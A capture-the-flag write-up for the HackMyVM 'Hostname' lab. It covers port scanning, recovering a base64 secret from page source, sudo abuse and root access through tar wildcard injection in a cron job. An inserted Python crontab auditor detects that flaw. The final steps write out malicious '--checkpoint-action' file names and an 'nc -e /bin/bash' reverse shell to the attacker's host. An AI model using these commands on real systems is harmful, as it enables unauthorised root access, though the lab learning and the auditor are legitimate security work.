NOTES ABOUT Hostname
[ 2022-10-07 ] [ HackMyVM / Hostname ] Status: Rooted
Skills: Port Scanning, Static Code Analysis, Wildcard Command Injection, Reverse Shell, Sudo
Tools: nmap, nc
PORT SCANNING
$ nmap -v -sS -A -p- 10.0.2.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 27:71:24:58:d3:7c:b3:8a:7b:32:49:d1:c8:0b:4c:ba (RSA)
| 256 e2:30:67:38:7b:db:9a:86:21:01:3e:bf:0e:e7:4f:26 (ECDSA)
|_ 256 5d:78:c5:37:a8:58:dd:c4:b6:bd:ce:b5:ba:bf:53:dc (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Panda
|_http-server-header: nginx/1.18.0
GETTING IN
$ curl -L http://10.0.2.17/
[...]
<div class="form-group">
<input name="secret" required="required" class="form-control"/>
<label class="form-label">Secret Word</label>
</div>
<div class="form-group">
<p class="alert">Give Some Input..!!</p>
<!-- Kung Fu Panda -->
<button class="btn" name="username" disabled="po">Read</button>
</div>
</form>
<link rel="stylesheet" href="./assets/cool.css"><br><br>
<h2 style="font-size:4vw"><span>I</span>M<span>POSSIBLE</span></h2>
<script crossorigin="S3VuZ19GdV9QNG5kYQ==" src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
<script src="./assets/script.js"></script>
$ echo "S3VuZ19GdV9QNG5kYQ==" | base64 -d
Kung_Fu_P4nda
REMOVED “DISABLED” IN BUTTON TAG WITH FIREFOX DEVELOPER TOOLS.
Pass: Kung_Fu_P4nda
$ ssh po@10.0.2.17
po@10.0.2.17's password: !ts-bl4nk
ELEVATING PRIVILEGES
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
[...]
po:x:1000:1000::/home/po:/bin/bash
oogway:x:1001:1001::/home/oogway:/bin/bash
$ find / -name po 2>/dev/null
/home/po
/etc/sudoers.d/po
/var/lib/sudo/lectured/po
$ cat /etc/sudoers.d/po
po HackMyVM = (oogway) NOPASSWD: /bin/bash
$ sudo -u oogway -h HackMyVM /bin/bash
oogway@hostname:/$
$ find / -name "*.txt" 2>/dev/null
/home/oogway/user.txt
$ cat /home/oogway/user.txt
$ find / -writable 2>/dev/null
/home/oogway
/home/oogway/.bash_history
/home/oogway/.bash_logout
/home/oogway/.profile
/home/oogway/.bashrc
/home/po/.bash_history
[...]
/opt/secret
$ grep -lir "/opt/secret" / 2>/dev/null
/etc/crontab
$ cat /etc/crontab
[...]
* * * * * root cd /opt/secret/ && tar -zcf /var/backups/secret.tgz *
[...]
"[...] bash expands * to be a list of the files and folders rather than passing it on the command [...]"
Tar arbitrary command execution [ WildCards_Gone_Wild.txt ]
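As an added defensive example (not part of the original notes), a small Python auditor that parses an /etc/crontab-style file and flags jobs where one of the tools covered by WildCards_Gone_Wild.txt (tar, rsync, chown, chmod) receives a bare, unquoted * with no "--" before it, which is exactly the pattern in the cron entry above. The sample crontab is constructed; the suggested hardening is to insert "--" so that expanded file names can no longer be parsed as options.

```python
import re
import shlex
# Constructed sample of a system crontab; line 4 mirrors the entry found on this page.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root cd /opt/secret/ && tar -zcf /var/backups/secret.tgz *
0 3 * * * root cd /var/www && tar -zcf /var/backups/www.tgz -- *
0 4 * * * backup tar -zcf /var/backups/etc.tgz -C /etc .
0 5 * * * root cd /var/www/uploads && chown -R www-data:www-data *
"""

# Tools whose options can be smuggled in as file names (see WildCards_Gone_Wild.txt).
WILDCARD_TOOLS = {"tar", "rsync", "chown", "chmod"}

def parse_system_crontab(text):
    """Yield (line number, user, command) for each job line of an /etc/crontab-style file."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # blank, comment or VAR=value line
        parts = line.split(None, 6)  # 5 time fields, user, rest of line is the command
        if len(parts) == 7:
            yield lineno, parts[5], parts[6]

def audit_command(command):
    """Flag simple commands that let the shell expand a bare glob into a wildcard tool's argv."""
    findings, cwd = [], None
    for simple in re.split(r"\s*(?:&&|\|\||;|\|)\s*", command):  # naive split; quoted operators not handled
        tokens = shlex.split(simple, posix=False)  # keep quotes so '*' stays distinguishable from *
        if not tokens:
            continue
        prog = tokens[0].rsplit("/", 1)[-1]
        if prog == "cd" and len(tokens) > 1:
            cwd = tokens[1]  # the directory whose file names become arguments
            continue
        if prog not in WILDCARD_TOOLS:
            continue
        for i, tok in enumerate(tokens[1:], 1):
            if tok.startswith("*"):  # expansion may begin with '-', i.e. look like an option
                if "--" not in tokens[1:i]:  # no end-of-options marker before the glob
                    findings.append({"tool": prog, "dir": cwd or "(cron cwd)", "glob": tok,
                                     "hardened": " ".join(tokens[:i] + ["--"] + tokens[i:])})
                break
    return findings

def audit_crontab(text):
    return [{"line": n, "user": user, **f}
            for n, user, cmd in parse_system_crontab(text) for f in audit_command(cmd)]
```

Globs with a literal prefix such as /opt/secret/* are not flagged, because every expanded name then starts with that prefix rather than with "-".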
NC LISTENER ON LOCAL PORT 80
$ touch -- --checkpoint=1
$ touch -- "--checkpoint-action=exec=sh rs"
$ echo "nc -e /bin/bash 10.0.2.15 80" >rs
WAIT FOR IT...
READ FLAG
$ cat /root/root.txt
$ init 0